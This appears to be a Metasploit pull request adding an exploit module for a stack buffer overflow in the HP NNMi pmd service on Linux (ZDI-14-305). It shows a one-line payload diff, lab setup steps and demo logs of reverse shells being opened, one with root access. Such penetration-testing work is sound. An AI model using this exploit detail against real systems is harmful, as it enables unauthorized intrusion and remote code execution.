### PR TITLE
Add module for ZDI-14-305 - HP NNMi bof / Linux

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
@@ -29,7 +29,7 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::CommandShell,
       'PayloadType'   => 'cmd_bash',
-      'RequiredCmd'   => 'bash-tcp',
+      'RequiredCmd'   => 'telnet',
       'Payload'       =>
         {
           'Offsets' => { },


### PR DESCRIPTION
This module exploits ZDI-14-305: Hewlett-Packard Network Node Manager I PMD Stack Based Buffer Overflow Remote Code Execution Vulnerability on Linux 64 bits systems.

This module has been tested successfully on:
- CentOS 5 (64 bits) / HP NNM i Linux 9.10 Eng SW E-Media
- CentOS 6 (64 bits) / HP NNM i Linux 9.20 Eng SW E-Media

HP NNM i trials can be downloaded from: https://h20575.www2.hp.com/evalportal/displayProductsList.do?prdcenter=HPSS_NMC&lang=en&cc=us&hpappid=PDAPI_PRMO_PRO2_EVAL

I recommend to read and follow the instructions coming with the trials in order to deploy the software, mainly the dependencies section.
## Verification
- [x] Deploy a vulnerable installation (see above). 
- [x] In order to make the info leak and rop chains to work, a supported version by the exploit should be used. When deploying the software I DIDN'T apply updates. I recommend to not apply them in order to test this module. On the other hand, if you apply updates, and/or try other versions, and would like to share feedback or you would like to share new rop chains / info leak offsets for other versions/revisions it's more than welcome :)
- [x] Verify which the vulnerable service (pmd) is running and listening on the default udp port (7426/UDP). On HP NNMi 6.20:

```
# ps aux | grep pmd
nmsproc   2278  0.0  0.0   8988  3488 ?        S    Sep23   0:00 pmd -SOV_EVENT;s100;q65536
# netstat -anp | grep udp.*pmd
udp        0      0 0.0.0.0:7426                0.0.0.0:*                               2278/pmd
```
- [x] Use the modules like in the DEMO, hopefully get sessions! :-)
## Demo
- HP NNMi 9.10 / CentOS 5

```
msf > use exploit/linux/misc/hp_nnmi_pmd_bof
msf exploit(hp_nnmi_pmd_bof) > show options

Module options (exploit/linux/misc/hp_nnmi_pmd_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  7426             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(hp_nnmi_pmd_bof) > set rhost 172.16.158.144
rhost => 172.16.158.144
msf exploit(hp_nnmi_pmd_bof) > check
[*] 172.16.158.144:7426 - The target service is running, but could not be validated.
msf exploit(hp_nnmi_pmd_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Sending a 'proto_tbl' request...
[*] Fingerprinting target...
[*] Searching HP NNMi 9.10 / CentOS 5 pointers...
[*] Pointer 0xf7f6ae86 found at offset 3080
[+] Exploiting HP NNMi 9.10 / CentOS 5 with libov base address at 0xf7f2f000...
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.144:43628) at 2014-09-24 00:07:30 -0500

id
uid=0(root) gid=0(root) context=system_u:system_r:initrc_t
^C
Abort session 1? [y/N]  y

[*] 172.16.158.144 - Command shell session 1 closed.  Reason: User exit
msf exploit(hp_nnmi_pmd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   HP NNMi 9.10 / CentOS 5
   2   HP NNMi 9.20 / CentOS 6


msf exploit(hp_nnmi_pmd_bof) > set target 1
target => 1
msf exploit(hp_nnmi_pmd_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Sending a 'proto_tbl' request...
[*] Searching HP NNMi 9.10 / CentOS 5 pointers...
[*] Pointer 0xf7f6ae86 found at offset 3080
[+] Exploiting HP NNMi 9.10 / CentOS 5 with libov base address at 0xf7f2f000...
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.144:43603) at 2014-09-24 00:09:11 -0500

id
uid=0(root) gid=0(root) context=system_u:system_r:initrc_t
^C
Abort session 2? [y/N]  y

[*] 172.16.158.144 - Command shell session 2 closed.  Reason: User exit

```
- HP NNMi 9.20 / CentOS 6

```
msf exploit(hp_nnmi_pmd_bof) > set rhost 172.16.158.132
rhost => 172.16.158.132
msf exploit(hp_nnmi_pmd_bof) > check
[*] 172.16.158.132:7426 - The target service is running, but could not be validated.
msf exploit(hp_nnmi_pmd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   HP NNMi 9.10 / CentOS 5
   2   HP NNMi 9.20 / CentOS 6


msf exploit(hp_nnmi_pmd_bof) > set target 0
target => 0
msf exploit(hp_nnmi_pmd_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Sending a 'proto_tbl' request...
[*] Fingerprinting target...
[*] Searching HP NNMi 9.10 / CentOS 5 pointers...
[*] Searching HP NNMi 9.20 / CentOS 6 pointers...
[*] Pointer 0x34b2d8 found at offset 3040
[+] Exploiting HP NNMi 9.20 / CentOS 6 with libov base address at 0x30f000...
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.132:53510) at 2014-09-24 00:16:53 -0500

id
uid=502(nmsproc) gid=502(nmsgrp) groups=502(nmsgrp) context=system_u:system_r:initrc_t:s0
^C
Abort session 3? [y/N]  y

[*] 172.16.158.132 - Command shell session 3 closed.  Reason: User exit
msf exploit(hp_nnmi_pmd_bof) > set rhost 172.16.158.133
rhost => 172.16.158.133
msf exploit(hp_nnmi_pmd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   HP NNMi 9.10 / CentOS 5
   2   HP NNMi 9.20 / CentOS 6


msf exploit(hp_nnmi_pmd_bof) > set target 2
target => 2
msf exploit(hp_nnmi_pmd_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Sending a 'proto_tbl' request...
[*] Searching HP NNMi 9.20 / CentOS 6 pointers...
[*] Pointer 0x34b2d8 found at offset 3040
[+] Exploiting HP NNMi 9.20 / CentOS 6 with libov base address at 0x30f000...
[*] Command shell session 4 opened (172.16.158.1:4444 -> 172.16.158.133:37338) at 2014-09-24 00:18:08 -0500

id
uid=502(nmsproc) gid=502(nmsgrp) groups=502(nmsgrp) context=system_u:system_r:initrc_t:s0
^C
Abort session 4? [y/N]  y

[*] 172.16.158.133 - Command shell session 4 closed.  Reason: User exit
```
